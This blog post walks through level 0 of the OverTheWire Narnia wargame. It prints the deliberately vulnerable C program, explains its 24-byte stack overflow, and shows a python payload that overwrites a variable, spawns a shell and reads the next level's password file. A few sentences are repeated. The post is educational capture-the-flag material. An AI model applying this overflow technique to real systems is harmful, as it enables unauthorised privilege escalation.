There many sites that give you the chance to experiment: one of the best I've played with in the past is overthewire.org, which runs a number of different challenges. Some are web related, other are based on Linux shell.
Let's start with a basic Linux shell challenge: Narnia
Architecture is a Debian Linux x64 (kernel 4.18.12) where some files were compiled for x86 with no ASLR or other protection tecniques (like stack canary, etc..)
The vulnerable code for the first level is narnia0 (and narnia0.c) located in /narnia/ directory:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | int main(){ long val=0x41414141; char buf[20]; printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); printf("Here is your chance: "); scanf("%24s",&buf); printf("buf: %s\n",buf); printf("val: 0x%08x\n",val); if(val==0xdeadbeef){ setreuid(geteuid(),geteuid()); system("/bin/sh"); } else { printf("WAY OFF!!!!\n"); exit(1); } return 0; } |
If we are able to change the val variable from hexadecimal 0x41414141 to 0xdeadbeef we receive a shell with level1 privileges.
Clearly the vulnerability is in the scanf() function that permits to read 24 bytes of input and stores it in the array buf[20] that is 20 bytes long.
Submitting 24 bytes of input will completely overwrite the previous variable on the stack, i.e. the variable val, which is 4 bytes long.
So we have to submit 20 bytes (with no special characters like NULL, \n, \r) and then 4 bytes containing 0xdeadbeef.
Submitting 24 bytes of input will completely overwrite the previous variable on the stack, i.e. the variable val, which is 4 bytes long.
So we have to submit 20 bytes (with no special characters like NULL, \n, \r) and then 4 bytes containing 0xdeadbeef.
We can use python to generate such a sequence: pay attention to the ssh client character encoding that can mess up the output
Then copy the output and submit to narnia0, executing narnia0 directly from the bash shell.
it looks like that passing python output to narnia0 via pipe doesn't work correctly...
Then copy the output and submit to narnia0, executing narnia0 directly from the bash shell.
it looks like that passing python output to narnia0 via pipe doesn't work correctly...
narnia0@narnia:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde" + "AAAA"'
AAAAAAAAAAAAAAAAAAAAï¾ÞAAAA
narnia0@narnia:/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAï¾ÞAAAA
buf: AAAAAAAAAAAAAAAAAAAAï¾Þ
val: 0xdeadbeef
$ id
uid=14001(narnia1) gid=14000(narnia0) groups=14000(narnia0)
$ cat /etc/narnia_pass/narnia1
e********e
$
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.